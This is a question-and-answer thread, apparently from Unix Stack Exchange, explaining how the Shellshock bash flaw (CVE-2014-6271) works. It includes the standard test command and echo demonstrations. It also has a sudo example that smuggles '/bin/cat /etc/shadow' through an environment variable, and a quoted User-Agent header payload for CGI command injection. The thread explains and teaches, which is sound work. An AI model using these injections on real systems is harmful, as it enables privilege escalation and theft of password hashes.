# CVE-2014-6271 Bash Vulnerability example

Tags: bash, security, shellshock

I am trying to understand what could be the security concern of `CVE-2014-6271` and all the links I see just gives me the below command.

```
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
```

If I get the output as,

```
vulnerable
this is a test
```

It means, my bash shell is vulnerable.

But in what way it is related to security? In other words, what harm could be done to my system?

Comment: Related: http://unix.stackexchange.com/questions/157381/are-any-other-versions-of-bash-vulnerable-to-shellshock-cve-2014-6271-beside

Answer (score 5):

The security concern is that if a bash is launched with a malicious environment variable set, that bash will execute the code in the variable.

For example, lets say you have a web server that calls `/bin/foo bar`. Lets say this `foo` application also uses an environment variable called `baz`, and the value of this variable comes from input provided by the user. So the web server application sets the environment, and then shells out to `foo bar`. Well, when `bash` reads the environment variables, if that provided variable has malicious code, `bash` is going to run it.

Normally this is not a concern. Environment variables are supposed to be completely safe. If the application using that variable misbehaves, that is another matter. But `bash` does not use the `baz` variable in the situation above.

For example:

#### testscript.sh

```
export BAZ='() { :;}; echo MALICIOUS CODE'
echo starting sleep
/bin/bash -c 'sleep 1'
```

When running it, we get the following

```
$ /bin/dash testscript.sh
starting sleep
MALICIOUS CODE
```

So simply from having that variable set, we can get bash to run arbitrary code.

Here's another example that uses no explicit shell, and makes no mention of bash:

```
$ perl -e '$ENV{"BAZ"}="() { :;}; echo MALICIOUS CODE"; print("starting sleep\n"); system("/bin/sleep 1;");'
starting sleep
MALICIOUS CODE
```

*(for this to work, `/bin/sh` needs to be bash)*

Comment: Thanks for the wonderful explanation. I appreciate it :)

Answer (score 0):

It works via sudo as well if **env_reset** is disabled (it's enabled by default in Debian at least)

`Defaults        env_reset`

but if one changes it to

`Defaults        !env_reset` (seen this on several systems in the past!!!)

then

`sudo Y='() { disabled; }; /bin/cat /etc/shadow;'  /tmp/zomg.sh`

root:$6$......`
**seg fault goes here**
sudoers file contains :

alinh ALL=/tmp/zomg.sh

Answer (score 0):

These guys explain how you can inject code into the webserver CGI process. It basically works by setting the useragent of a request in such a way that it contains the exploit code:

http://packetstormsecurity.com/files/128394/bash-poc.txt

```
'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
```

When that attack succeeds you can gain access to the webserver with webserver privileges and its entire content is to be regarded as compromised.